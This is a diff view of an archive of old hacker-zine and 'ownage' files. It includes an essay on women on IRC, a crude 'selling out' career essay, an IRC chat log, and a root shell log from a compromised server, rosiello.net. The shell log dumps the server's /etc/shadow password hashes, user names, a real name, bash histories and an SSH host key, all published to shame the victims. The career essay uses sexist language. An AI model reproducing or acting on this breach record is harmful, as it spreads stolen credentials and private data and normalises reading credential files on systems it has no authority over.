b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
welp, this is the end. I would have tried to put more in, but you know how
ppl are, not submitting there shit, etc etc.. So, this is adeux. Until
next time.. wait up for b4b0-02.
always pissed off,
ge0rge the elite gerb1l.
-< <-
EEEEE oOOOOOo FFFFFF
EEE OOO OOO FFF
EEEE OOO OOO FFFF
EEE OOO OOO FFF
EEEEE OOOOOOO FFF
( eof )

2459
b4b0/b4b0-02.txt
View file

File diff suppressed because it is too large Load diff

2089
b4b0/b4b0-03.txt
View file

File diff suppressed because it is too large Load diff

2034
b4b0/b4b0-05.txt
View file

File diff suppressed because it is too large Load diff

3382
b4b0/b4b0-06.txt
View file

File diff suppressed because it is too large Load diff

1892
b4b0/b4b0-07.txt
View file

File diff suppressed because it is too large Load diff

2676
b4b0/b4b0-08.txt
View file

File diff suppressed because it is too large Load diff

5875
b4b0/b4b0-09.txt
View file

File diff suppressed because it is too large Load diff

1906
b4b0/b4b0-10.txt
View file

File diff suppressed because it is too large Load diff

67
b4b0/irc.girls.txt
View file

@ -1,67 +0,0 @@
Hello, my name is Jen. I decided to write an article on the role
that females play on irc, and the overall personna that is created
based solely on their gender. The basis for this article was made
on assumptions created by a survey taken, questioning close to 30
active irc users.
Most questioned were people of #b4b0, or friends of mine (see list of
nicks below). The questions i asked, consisted mainly of "what do you
think of females on irc", and to the girls, i asked mainly "do you feel
as though you're treated differently, for the sole reason of being female".
The feedback I received, varied a little, but the overall conclusion
resulted in, 'yes, females are treated differently'. Although, the ways
that the females were differentiated, varied from guys either being harsh
or overly nice. Their intensions were also questioned in the survey, and
I'd have to say that overall the guys with which we associate are warm-hearted
and sincere, but occasionally lacking entertainment or suffering from boredom.
I wasn't surprised to find that a lot of the guys question the authenticity
of the information that a girl offers (eg. pictures, personal information,
sexual oriented information, gender, etc.) Not many of the guys made a decision
that just because a girl is on irc, means that she is either lifeless or unworthy.
However, there was a comment made, that basically noted "the reason for a girl
to be on irc is to get attention, so she will do whatever is asked of her,
including cybersex or phonesex, to accomplish a sort of acceptance, or
acknowledgement".
Girls be proud of these guys though, and appreciate the hard work and effort
of their endeavors, because they're willing to share their knowledge and teach
you. All of the guys in the survey denied that they would not coach or teach
someone just because they are female. There is no reason why we shouldn't
have interest in what the guys are passionate about, or what they excel in,
if we're going to spend so much time with them, or in their presence. I would
also guess that, we might be respected more, if we did make at least the effort
to learn about the things that they participate in.
I asked the girls if they were upset or frustrated by the expectations made
by guys online. The comparisons, expectations, standards, we all know these
obstacles can at times be upsetting or disppointing. After surveying the girls,
i was surprised to find that most of them didn't really care what the guys thought
about them. Seeming pretty confident (unfortunately, i am lacking in this
attribute, so my perspective is different from some of the girls), a lot of
them seemed to make the decision that, if they're not seen as being good enough,
than the person judging was obviously the inferrior one.
The basic conclusion, and request from this article, comes down to, appreciate
and respect each other equally. Be there for people, for the reason of making
a difference, not for the expectation of receiving some kind of "favor" in
return. Don't make assumptions about someone, nor create pretenses to be
appreciated. If you have to have a nude picture with a saying "bozo owns me"
accross your chest, than obviously there is lack for respect, acknowledgement,
and appreciation for the person you are, and for your expression. It's commonly
said that you can't really know someone from irc on a personal level, but i
disagree. Intimacy and friendship is very apparent online. Appreciate the people
that you spend hours with, without being so harsh and insulting without reason.
Oh, last thing...everyone denies their cybering experience, so why do us girls
recieve constant requests? ;P
Special thanks to everyone that participated in the survey, and especially to #b4b0.
(tip, tgb, dono, pr0phet, polder, jsbach, mosthated, angieb, mynd, icesk, misfit,
eckis, kyle, borgie, justin, n0k1a, KKR, schemerz, sistym, opcode, ch1ckie, r1ngy,
hitman, mya)
~lusta
For the results of the survey, actual questions and answers asked, check out:
http://www.lusta.org/survey.html

103
b4b0/selling.out
View file

@ -1,103 +0,0 @@
How to Sell Out With Style*
*and still remain ueberelite with the underground scene
by HomeySan
You're in your 20's now. You've dropped out (or finished) college. You've
worked a few jobs in the industry. Maybe doing Unix admin, maybe NT admin,
maybe even some security stuff. You've moved up a tax bracket or two. The
scene just isn't doing it for you anymore. You have quite a few friends
there, but it just isn't the focal point of your life anymore. You don't
sit on IRC full-time waiting for your classes to start. The thought of
late night sessions in front of /dev/console gets you worried about being
too groggy for work the next day. You start reading real books and magazines,
not Wired or 2600 or "Takedown", but things by Clancy, Neitzche, and Koontz.
Scene
There are a lot of ways to leave the scene. Now that you are over 18, getting
busted means a lot more. Therefore, never showing up on IRC, ditching your
old e-mail accounts, and having a friend start saying things "I haven't
heard from $dude in a while... I heard he may have been busted!" is a
starting place. I'm not the compulsive liar. I just admit I sold out, but
I still have my sk1llz and my gr00ve.
"The Scene" isn't like Cosa Nostra, either-- there is no rule that says
"once you're out, they try and get you back in." Most people in the scene
don't give a rats ass about you, even if you've slept with them. If they
don't give a shit about you, why should you care about them? Just start
IRC'in less and less and less. Since you are around less and less, and
only a select few actually recognize your nick, you are that much more
ph3ared and rev3ared.
"The Scene" grows up though. Instead of kiddies talking on IRC or alt.2600
they talk on comp.security.unix and bugtraq@netspace.org. Plus, you can
put BUGTRAQ in digest mode, and pick and choose which news articles you
want to read. This saves you time. You can weed out all the OS holy war
bullshit, keep up with the 0-day, and keep the low profile you've always
wanted.
Job
I'd have no problem working for the Feds if they actually paid. I just get
a hard on thinking about the irony. I was actually offered a contract position
at netcom doing security for them. That had bad karma (or mitnicka) written
all over it. Work hard to make sure you wind up doing the least amount of
work for the most money. My last job in San Jose was working with a group
of 10 sysadmins. I was able to pawn off a lotta work on my co-workers, yet
still take credit for a good portion of it. Meanwhile, I got to watch
kids on IRC and research a lotta other stuff to work on the business I
was trying to start. In the year and half I was in Silicon Valley I was
able to make my pay-rate go from $49/hr to $62/hr. I even had a job which
was $100/hr 1099 for a few weeks setting up a NetApp and some Ultra 60's.
Don't run into the industry saying you want security work. That makes you
look like a poser. Instead, gradually work towards that. "I'm a sysadmin
who knows security." Be a damned good sysadmin, and then people will outright
trust you with their firewalls and stuff. Also, as tempting as it may be,
don't leak elite corporate info. Keep it for yourself, and share with some
friends at most.
Car
Do the dance with a devil. Get something k-rad and take out a fucking loan
for it. Who cares if it cost more than a year at Harvard. I have my two
Corvettes. I have chicks checking me out. I also do my own work on them--
everything from oil changes on up to modifying the electrical and fuel
systems. It also provides for hours of entertainment when people in Civic
Del Sols try and race you from a stoplight. You'd think it gets old, but it
doesn't. Get something Fun, Fast, and Impractical. Remember, FFI. Cars on
this list include:
Corvette, Viper, Monster Miata, Mustang Cobra, Lotus *, Karmann Ghia,
Porche 911/carrera (no boxter), BMW M, Ferrari 250GT California (reproductions
count), Shelby Cobra. Japanese cars don't count, not even the NSX. And no,
Nissan Skyline GTRs are NOT legal in the US. Don't even think about it :)
Bitches
Pimpz up hoes down, yo! Don't tie your self down. Date a few different
good looking women every so often. No IRC girlies. Make sure they aren't
technical. That way, when you run out of conversation fodder, you can make
up technical stuff and they'll think you're da shit. Don't date lame chicks
who will come over and do nasty things to you with the snap of a finger.
That gets old too quick. Make sure you gotta go out on dates from time
to time to get some-- that way you don't become an IRC/homebody junkie.
Remember, you're trying to kick that habit. Dates that take effort to
screw are usually worth the effort. Even if you don't have that great a
time, you'll still get laid (or get some) and they'll get off, too.
Family
As dysfunctional as it is, keep in touch with your siblings and folks. They
will be proud of you for having a life-- even jealous since yours will kick
so much more ass than their shitty lives. My sister is mad jealous of me,
since I got the cars and the phat cash job. She's just a school teacher,
but she's still pretty cool. But it is even cooler having your older sister
look up to you. Plus, if nasty shit goes down, it's always cool to have
your family be your friends and be on your side. So, do something nice for
them-- even as lame as remembering your sister's birthday.
Peace Kids. Hopefully these tricks will help you out.
-HomeySan

1135
dikline/Raveownage.txt
View file

File diff suppressed because it is too large Load diff

597
dikline/Rosiellownage.txt
View file

@ -1,597 +0,0 @@
# ssh root@www.rosiello.net -p 220
Password:
Last login: Mon Aug 15 22:27:02 2005 from 192.168.0.6
debian:~# uname -a; id
Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
debian:/var/run# uptime
12:29:24 up 2 days, 17 min, 1 user, load average: 0.70, 0.66, 0.55
debian:~# ls -la
total 76
drwxr-xr-x 11 root root 4096 2005-08-13 16:30 .
drwxr-xr-x 21 root root 4096 2005-08-13 16:21 ..
drwx------ 2 root root 4096 2005-08-13 14:02 .aptitude
-rw------- 1 root root 4323 2005-08-15 22:40 .bash_history
-rw-r--r-- 1 root root 412 2004-12-15 21:53 .bashrc
-rw-r--r-- 1 root root 174 2005-08-13 13:51 dbootstrap_settings
drwx------ 2 root root 4096 2005-08-13 15:41 .gconf
drwx------ 2 root root 4096 2005-08-13 15:42 .gconfd
drwx------ 2 root root 4096 2005-08-13 14:55 .gnome
drwx------ 3 root root 4096 2005-08-13 15:03 .gnome2
drwx------ 2 root root 4096 2005-08-13 15:03 .gnome2_private
drwxr-xr-x 2 root root 4096 2005-08-13 15:04 .gstreamer-0.8
-rw-r--r-- 1 root root 1336 2005-08-13 13:51 install-report.template
drwx------ 3 root root 4096 2005-08-13 16:30 .kde
-rw------- 1 root root 15 2005-08-13 16:42 .nano_history
-rw-r--r-- 1 root root 110 2004-11-10 15:10 .profile
drwx------ 3 root root 4096 2005-08-13 16:30 .synaptic
-rw------- 1 root root 0 2005-08-13 15:28 .Xauthority
-rw-r--r-- 1 root root 2352 2005-08-13 15:39 XF86Config.new
debian:~# cat .bash_history
ls
uname -a
cd /etc/x11
cd /etc/X11
ls
more *-4
dpkg-reconfigure xserver-xfree86
killall gdm
killall gdm
ps aux
reboot
ls
exit
pico /etc/inittab
ifconfig
reboot
ls
xf86cfg -textmode
/etc/init.d/gdm start
/etc/init.d/gdm stop
/etc/init.d/gdm start
mount /media/cdrom
cd /media/cdrom
ls
cd Drivers
ks
ls
ndiswapper -i bcmwl5.inf
ifcomfig
ifconfig
fg
df
ndiswapper -i bcmwl5.inf
apt-get install ndiswrapper
apt-get install ndiswrapper-common
apt-get install ndiswrapper-utils
ndiswrapper
ndiswrapper -i
ndiswrapper -i *.inf
ndiswrapper -l
ndiswrapper -m
dmesg
modprobe wlan0
modprobe ndiswrapper
ls
dmesg
killall synaptic
synaptic
modprobe ndiswrapper
cd /usr/src
;ls
ls
ls
ls
bzip3
bzip2
bzip2 -d *.bz2
tar -fvx ndiswrapper-source.tar
tar fvx ndiswrapper-source.tar
cd modules
make
ls
cd *
make
make
make
uname -a
make
cd /usr/lib
cd /lib/modules
ls
make
cd /usr/src/modules
cd *
make
cd /var/cache
ls
cd apt/achrives
cd apt/
ls
cd arc*
ls
ls kernel*
kpkg-install kernel-image-2.6.8-2-386_2.6.8-16_i386.deb
dpkg-install kernel-image-2.6.8-2-386_2.6.8-16_i386.deb
dpkg install kernel-image-2.6.8-2-386_2.6.8-16_i386.deb
ls kernel*
apt-get install kernel-image-2.6.8-2-386_2.6.8-16_i386.deb
apt-get install kernel-image-2.6.8-2-386
reboot
ls
ping alpha
ls
cd /etc/X11
more *-1
more *-4
dpkg-reconfigure xserver-xfree86
startx
/etc/init.d/gdm stop
/etc/init.d/gdm start
/etc/init.d/gdm stop
cd /usr/bin/X11
ls
ls | grep cfg
xf86cfg
xf86cfg -textmode
killall xf86cfg
ps aux
killall -X
killall X
killall X
kill 1584
startx gnome
/etc/init.d/gdm start
/etc/init.d/gdm stop
xf86cfg -textmode
/etc/init.d/gdm stop
/etc/init.d/gdm start
/etc/init.d/gdm stop
xf86cf
xf86cfg
l
ls /dev/mise
xf86cfg -textmode
ls /dev/input/mise
xf86cfg -textmode
ls /dev/imput/mise
ls /dev/input
ls /dev/input/mice
cd /dev
ln -s input/mice mice
ln -s input/mice mouse
xf86cfg
X -configure
ln -s /usr/lib/libglide2x.so /usr/X11R6/lib/modules
X -configure
XFree86 -xf86config /root/XF86Config.new
killall -X
killall X
ps aux
kill 1723
XFree86 -xf86config /root/XF86Config.new
XFree86 -xf86config
XFree86 -xf86config -textmode
X
cd /etc/X11
cp *-4 -4.bk
cp "*-4" -4.bk
cp "*-4" "-4.bk"
cp "*-4" ./"-4.bk"
cp ./**-4" ./"-4.bk"
ls
mv XF86Config-4 XF86Config-4.bk
cp /root/XF86Config.new XF86Config-4
X
/etc/init.d/gdm start
/etc/init.d/gdm stop
dmesg
dmesg | grep mouse
pico XF86Config-4
/etc/init.d/gdm start
xf86cfg
xf86cfg -textmode
/etc/init.d/gdm stop
/etc/init.d/gdm start
modprobe wlan0
modprobe ndiswrapper
dmesg
iwconfig
ifconfig
iwconfig
kwirelessmonitor
kwirelessmonitor
exot
kwirelessmonitor
exit
ifup wlan0
;s
ls
dmesg
iwconfig
iwlist wlan0 scan
iwconfig wlan0 mode Managed
iwconfig wlan0 essid default
ifconfig wlan0 up
ifconfig
iwconfig
dhclient wlan0
exit
ifconfig
dhclient
dhclient wlan0
modprobe wlan0
pico /etc/modules.conf
ls /lib/modules
ls /lib/modules/`uname -r`/misc
cd /lib/modules/`uname -r`/misc
pwd
pico /etc/modules.conf
update-modules
modprobe wlan0
pico /etc/modules.conf
modprobe wlan0
modprobe ndiswrapper
dmesg
dhclient ndiswrapper
dhclient wlan0
ifconfig
ping www.hotmail.com
cd /etc/init.d
l;s
ls
ls | grep ndis
pico ndiswrapper
/usr/bin/ndiswrapper -l
/usr/sbin/ndiswrapper -l
pico ndiswrapper
chmod a+x ./ndiswrapper
./ndiswrapper
exit
cd /etc/network
;s
ls
pico if-up.d
cd if-up.d
ls
cd ..
ls
pico run
cd run
ls
pico ifstate
cd ..
pico ifstate
ls
pico options
cat * | grep wlan
cat * | grep eth0
fgrep * | grep eth0
fgrep eth0 *
pico interfaces
exit
dmesg
dmesg | grep wlan0
ls /etc/init.d
pico /etc/modules.conf
cd /etc/
ls | grep modules
cd modules
ls
pico modules
reboot
ifup wlan0
iwlist
iwlist scan wlan0
iwlist scan
iwlist wlan0 scan
cd /etc/init.d
ls
cd /etc/rc5.d
ls
pico S199ndis
dhclient wlan0
modprobe ndiswrapper
dhclient wlan0
chmod a+x ndiswrapper
chmod a+x S199ndis
reboot
cd /etc/network
ls
pico interfaces
ifup wlan0
pico interfaces
exit
shutdown -r 0
\
useradd jmoschetti45
passwd jmoschetti45
apt-get install netcat
apt-get install nc
netcat
w
w
w
w
w
w
w
w
w
w
ls ~jmoschetti45
mkdir ~jmoschetti45
chown jmoschetti45.users ~jmoschetti45
dmesg
tail /var/log/syslog
tail /var/log/syslog
dmesg
mite im a friend of rave's
passwd jmoschetti45
tail /var/log/syslog
dmesg
quit
exit
w
wall
wall
w
last
w
w
w
exit
ls
w
w
w
ps aux
w
ps aux | grep pts/0
ps aux | grep pts/0
ps aux | grep pts/0
exit
debian:~# ls /home/
hub jmoschetti45 rave
debian:~# cd /home/rave/
debian:/home/rave# ls
Desktop
debian:/home/rave# ls -la
total 112
drwxr-xr-x 20 rave rave 4096 2005-08-14 11:40 .
drwxrwsr-x 5 root staff 4096 2005-08-15 22:25 ..
-rw------- 1 rave rave 318 2005-08-15 00:23 .bash_history
-rw-r--r-- 1 rave rave 704 2005-08-13 13:59 .bash_profile
-rw-r--r-- 1 rave rave 1290 2005-08-13 13:59 .bashrc
drwxr-xr-x 2 rave rave 4096 2005-08-13 15:42 Desktop
-rw------- 1 rave rave 26 2005-08-13 15:42 .dmrc
drwxr-xr-x 7 rave rave 4096 2005-08-13 15:43 .evolution
drwx------ 4 rave rave 4096 2005-08-13 17:13 .gconf
drwx------ 2 rave rave 4096 2005-08-14 11:40 .gconfd
-rw-r----- 1 rave rave 0 2005-08-13 16:18 .gksu.lock
drwx------ 3 rave rave 4096 2005-08-13 15:42 .gnome
drwx------ 7 rave rave 4096 2005-08-13 17:13 .gnome2
drwx------ 2 rave rave 4096 2005-08-13 15:42 .gnome2_private
drwxr-xr-x 2 rave rave 4096 2005-08-13 15:42 .gstreamer-0.8
-rw-r--r-- 1 rave rave 86 2005-08-13 15:42 .gtkrc-1.2-gnome2
-rw------- 1 rave rave 636 2005-08-13 17:13 .ICEauthority
drwxr-xr-x 2 rave rave 4096 2005-08-13 15:55 .icons
drwx------ 3 rave rave 4096 2005-08-13 15:46 .kde
drwxr-xr-x 3 rave rave 4096 2005-08-13 15:48 .mcop
-rw------- 1 rave rave 31 2005-08-13 16:28 .mcoprc
drwx------ 3 rave rave 4096 2005-08-13 15:42 .metacity
drwx------ 3 rave rave 4096 2005-08-13 16:33 .mozilla
drwxr-xr-x 3 rave rave 4096 2005-08-13 15:42 .nautilus
drwxr-xr-x 2 rave rave 4096 2005-08-13 15:46 .qt
-rw------- 1 rave rave 0 2005-08-13 15:42 .recently-used
drwx------ 2 rave rave 4096 2005-08-13 17:13 .ssh
drwxr-xr-x 2 rave rave 4096 2005-08-13 15:55 .themes
drwx------ 3 rave rave 4096 2005-08-13 16:41 .thumbnails
-rw-r--r-- 1 rave rave 3597 2005-08-14 11:40 .xsession-errors
debian:/home/rave# cat .bash_history
su
su -
su -
kwirelessmonitor
ifup wlan-
ifup wlan0
su
su
exit
su
exit
su
su
exit
su -
pico /etc/modules
dmesg | grep ndis
ifup wlan-
su
ls
/sbin/ifconfig
su
exit
ssh rave@192.168.0.6
xauth
xauth +
xauth -h
xauth trusted 192.168.0.6
quit
/sbin/ifconfig
ssh rave@192.168.0.6
/sbin/ifconfig
ping www.hotmail.com
su
exit
debian:/home/rave# cat .ssh/known_hosts
192.168.0.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw9yp5U83EGtwqLclFxRLLuJYdQzWDQi2pag5CXDHwAFyhycGrv4ebLg5YRfriqVo1oXZ6FDkF82k5MTdSK4ZSjoL9EeTLPFNkdmnA04wvpUZo5AneklofNOQTdYXqYbFJ3/9uZMBzotqRHwwJ5b7wudFeVMwjEVqOd7wlD4346k=
debian:/home/jmoschetti45# ls
irctree-0.10 irctree-0.10.tar.gz
debian:/home/jmoschetti45# ls -la
total 28
drwxr-sr-x 3 jmoschetti45 users 4096 2005-08-15 00:35 .
drwxrwsr-x 5 root staff 4096 2005-08-15 22:25 ..
-rw------- 1 jmoschetti45 users 384 2005-08-15 00:49 .bash_history
drwxr-sr-x 2 jmoschetti45 users 4096 2002-12-23 14:29 irctree-0.10
-rw-r--r-- 1 jmoschetti45 users 8292 2005-08-15 00:35 irctree-0.10.tar.gz
debian:/home/jmoschetti45# cat .bash_history
exit
w
exit
passwd
nc
wget ftp://ftp.habets.pp.se/pub/synscan/irctree-0.10.tar.gz
ls
tar zxf irctree-0.10.tar.gz
cd irctree-0.10
ls
chmod +x irctree-getlinks.sh
./irctree-getlinks.sh
./irctree-getlinks.sh irc.rosiello.net
ls
cat irctree
perl irctree-parse.pl
cat README
./irctree irc.rosiello.net
bah
chmod +x irctree
ls
./irctree irc.rosiello.net:6667
./irctree irc.rosiello.net
debian:/home# ls hub/
Unreal3.2 Unreal3.2.3.tar.gz
debian:/home# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:102:102::/var/spool/exim4:/bin/false
rave:x:1000:1000:johnny mast,,,:/home/rave:/bin/bash
postgres:x:100:103:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash
identd:x:101:65534::/var/run/identd:/bin/false
messagebus:x:103:104::/var/run/dbus:/bin/false
hal:x:106:106:Hardware abstraction layer,,,:/var/run/hal:/bin/false
sshd:x:104:65534::/var/run/sshd:/bin/false
saned:x:110:110::/home/saned:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
jmoschetti45:x:1001:100::/home/jmoschetti45:
hub:x:1002:1002:,,,:/home/hub:/bin/bash
debian:/home# cat /etc/shadow
root:$1$/Rn5d1oP$hBFjq3hU6bjEN5h4o6FhJ1:13008:0:99999:7:::
daemon:*:13008:0:99999:7:::
bin:*:13008:0:99999:7:::
sys:*:13008:0:99999:7:::
sync:*:13008:0:99999:7:::
games:*:13008:0:99999:7:::
man:*:13008:0:99999:7:::
lp:*:13008:0:99999:7:::
mail:*:13008:0:99999:7:::
news:*:13008:0:99999:7:::
uucp:*:13008:0:99999:7:::
proxy:*:13008:0:99999:7:::
www-data:*:13008:0:99999:7:::
backup:*:13008:0:99999:7:::
list:*:13008:0:99999:7:::
irc:*:13008:0:99999:7:::
gnats:*:13008:0:99999:7:::
nobody:*:13008:0:99999:7:::
Debian-exim:!:13008:0:99999:7:::
rave:$1$8rKozZuE$ZN95.h5LCgVWN/L1Uiqj70:13008:0:99999:7:::
postgres:!:13008:0:99999:7:::
identd:!:13008:0:99999:7:::
messagebus:!:13008:0:99999:7:::
hal:!:13008:0:99999:7:::
sshd:!:13008:0:99999:7:::
saned:!:13008:0:99999:7:::
gdm:!:13008:0:99999:7:::
jmoschetti45:$1$oP4b5o0A$4aojAGoqbHF5GjmcczgJ3.:13010:0:99999:7:::
hub:$1$5i8/Od9B$pun0qoyMKb287yp.44qOc.:13010:0:99999:7:::
debian:~# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 1504 512 ? S Aug14 0:00 init [5]
root 2 0.0 0.0 0 0 ? SN Aug14 0:00 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? S< Aug14 0:24 [events/0]
root 4 0.0 0.0 0 0 ? S< Aug14 0:00 [khelper]
root 23 0.0 0.0 0 0 ? S< Aug14 0:00 [kblockd/0]
root 45 0.0 0.0 0 0 ? S Aug14 0:00 [pdflush]
root 46 0.0 0.0 0 0 ? S Aug14 0:00 [pdflush]
root 48 0.0 0.0 0 0 ? S< Aug14 0:00 [aio/0]
root 47 0.0 0.0 0 0 ? S Aug14 0:00 [kswapd0]
root 190 0.0 0.0 0 0 ? S Aug14 0:00 [kseriod]
root 211 0.0 0.0 0 0 ? S< Aug14 0:00 [ata/0]
root 296 0.0 0.0 0 0 ? S Aug14 0:00 [kjournald]
root 332 0.0 0.2 1492 460 ? S<s Aug14 0:00 udevd
root 885 0.0 0.0 0 0 ? S Aug14 0:00 [khubd]
daemon 2482 0.0 0.2 1612 456 ? Ss Aug14 0:00 /sbin/portmap
root 2960 0.0 0.4 2260 820 ? Ss Aug14 0:00 /sbin/syslogd
root 2963 0.0 0.7 2448 1504 ? Ss Aug14 0:00 /sbin/klogd
root 2989 0.0 0.4 2380 880 ? Ss Aug14 0:00 dhclient wlan0
103 2994 0.0 0.5 2092 996 ? Ss Aug14 0:00 /usr/bin/dbus-daemon-1 --system
hal 2999 0.0 1.3 3956 2488 ? Ss Aug14 0:26 /usr/sbin/hald --drop-privileges
root 3002 0.0 0.4 2556 876 ? Ss Aug14 0:00 /usr/bin/dirmngr --daemon --sh
102 3074 0.0 0.9 5392 1752 ? Ss Aug14 0:00 /usr/sbin/exim4 -bd -q30m
root 3079 0.0 0.3 2240 724 ? Ss Aug14 0:00 /usr/sbin/inetd
lp 3084 0.0 0.4 2464 884 ? Ss Aug14 0:00 /usr/sbin/lpd -s
postgres 3143 0.0 1.1 17200 2196 ? S Aug14 0:01 /usr/lib/postgresql/bin/postmaster -D /var/lib/postgres/data
postgres 3167 0.0 1.5 8000 2972 ? S Aug14 0:00 postgres: stats buffer process
postgres 3168 0.0 1.0 7008 2040 ? S Aug14 0:00 postgres: stats collector process
postgres 3173 0.0 0.8 4700 1688 ? Ss Aug14 0:00 /usr/lib/postgresql/bin/pg_autovacuum -D -p 5432 -L /var/log/postgresql/autovacuum_log
root 3180 0.0 0.7 3468 1504 ? Ss Aug14 0:00 /usr/sbin/sshd
root 3184 0.0 0.5 2748 1144 ? Ss Aug14 0:00 /usr/sbin/famd -T 0
root 3188 0.0 0.4 2376 924 ? Ss Aug14 0:00 /sbin/rpc.statd
daemon 3191 0.0 0.3 1684 628 ? Ss Aug14 0:00 /usr/sbin/atd
root 3194 0.0 0.4 1768 820 ? Ss Aug14 0:00 /usr/sbin/cron
root 3199 0.0 4.1 16272 7840 ? Ss Aug14 0:00 /usr/sbin/apache2 -k start -DSSL
root 3204 0.0 1.2 9268 2356 ? Ss Aug14 0:00 /usr/bin/gdm
root 3226 0.0 0.2 1500 484 tty1 Ss+ Aug14 0:00 /sbin/getty 38400 tty1
root 3234 0.0 1.4 9600 2696 ? S Aug14 0:00 /usr/bin/gdm
root 3377 0.0 4.6 76620 8808 ? S< Aug14 0:01 /usr/X11R6/bin/X :0 -audit 0 -auth /var/lib/gdm/:0.Xauth -nolisten tcp vt7
www-data 3446 0.0 4.1 16272 7864 ? S Aug14 0:00 /usr/sbin/apache2 -k start -DSSL
www-data 3447 0.0 4.1 16272 7864 ? S Aug14 0:00 /usr/sbin/apache2 -k start -DSSL
www-data 3448 0.0 4.1 16272 7864 ? S Aug14 0:00 /usr/sbin/apache2 -k start -DSSL
www-data 3449 0.0 4.1 16272 7864 ? S Aug14 0:00 /usr/sbin/apache2 -k start -DSSL
www-data 3450 0.0 4.1 16272 7864 ? S Aug14 0:00 /usr/sbin/apache2 -k start -DSSL
gdm 3488 0.0 3.6 10840 7028 ? Ss Aug14 0:05 /usr/bin/gdmlogin
root 5256 0.0 1.0 14460 2076 ? Ss Aug15 0:00 sshd: root@pts/0
root 5259 0.0 0.8 3064 1652 pts/0 Ss Aug15 0:00 -bash
root 5274 0.0 0.4 2340 908 pts/0 S Aug15 0:00 su hub
hub 5275 0.0 0.8 3044 1680 pts/0 S+ Aug15 0:00 bash
root 15698 0.0 1.0 14624 2068 ? Ss 12:02 0:00 sshd: root@pts/1
root 15701 0.0 0.8 3092 1708 pts/1 Ss 12:02 0:00 -bash
root 15732 0.0 0.4 2780 900 pts/1 R+ 12:05 0:00 ps aux
debian:~# last | grep rave
rave pts/0 192.168.0.6 Mon Aug 15 00:23 - 00:23 (00:00)
rave pts/0 :0.0 Sat Aug 13 17:13 - down (18:26)
rave :0 Sat Aug 13 17:13 - down (18:26)
rave pts/0 :0.0 Sat Aug 13 17:06 - 17:07 (00:01)
rave :0 Sat Aug 13 17:05 - 17:07 (00:01)
rave pts/0 :0.0 Sat Aug 13 16:57 - down (00:03)
rave :0 Sat Aug 13 16:56 - down (00:04)
rave pts/0 :0.0 Sat Aug 13 16:52 - down (00:01)
rave :0 Sat Aug 13 16:51 - down (00:02)
rave pts/0 :0.0 Sat Aug 13 16:46 - 16:48 (00:02)
rave pts/0 :0.0 Sat Aug 13 16:41 - 16:46 (00:04)
rave :0 Sat Aug 13 16:40 - 16:49 (00:08)
rave :0 Sat Aug 13 16:24 - 16:38 (00:14)
rave :0 Sat Aug 13 16:17 - 16:22 (00:04)
rave :0 Sat Aug 13 15:42 - down (00:33)
debian:~# echo Owned
Owned
debian:~# exit
logout
Connection to www.rosiello.net closed.

5485
dikline/dikline-vs-rave.txt
View file

File diff suppressed because it is too large Load diff

1378
dikline/gotowned2.txt
View file

File diff suppressed because it is too large Load diff

3221
dikline/nocturnal.txt
View file

File diff suppressed because it is too large Load diff

2199
dikline/rotorownage.txt
View file

File diff suppressed because it is too large Load diff

645
dikline/silent.txt
View file

@ -1,645 +0,0 @@
----------------------------------------------------------------------------
fmrj@exedius fmrj $ cat h0no.txt | grep \|silent
:d4rkgr3y!~phear@217.107.223.43 PRIVMSG FoxTrot- : |silent is m00 member
----------------------------------------------------------------------------
18:53 <|silent> btw! there is a group outta there who own boxes from
security-team-ppl
18:53 <|silent> 2 m00 ppl already got owned and one teso guy got owned
18:53 <|silent> i know all the 3 ppl!
18:54 <|silent> i'm a bit scared they seem to be good i just hope they wont
take my server :/ <-------- (greyhat.co.uk , oral-sex.bz ,
digitaljunk.de)
18:54 <|silent> check http://h0h0.com/h0no.txt
18:54 <|silent> search for silent in the document
18:55 <stigma> heh, nice :P
18:55 <stigma> they wont manage it :P
<----------
18:55 <stigma> ill read it, i just fix the mail stuff first
18:57 <|silent> okay :)
19:00 <stigma> seems to work ;)
19:00 <|silent> :D
19:01 <stigma> hmmm
19:01 <stigma> which box is that ?
19:01 <stigma> drwx------ 2 rob rob 512 Sep 19 19:06 rob
19:01 <stigma> drwx------ 2 silent silent 512 Sep 20 06:16
silent
19:02 <|silent> it was the box from a m00 teammate
19:02 <stigma> ok :P
19:02 <|silent> from a fucking good security guy also! so i'm a bit scared
;/ <-------
19:03 <|silent> http://reflux.dyndns.org/
19:03 <stigma> lol, they write like fucking script-kiddies :P
19:03 <stigma> ok
19:03 <|silent> lol
19:03 <stigma> if they manage to get your root password it is no problem to
root it
19:03 <stigma> else it's HARD
19:03 <stigma> i don't think they will manage to do so
<--------------
19:04 <stigma> since you use random return addresses
19:04 <stigma> most exploits require a pre-defined return address to occour
to work
19:04 <|silent> yea but.. they don't use bruteforce shit.. as the hono file
say ;/
19:04 <stigma> atleast overflow exploits
19:04 <|silent> they use useraccounts and gain root with it
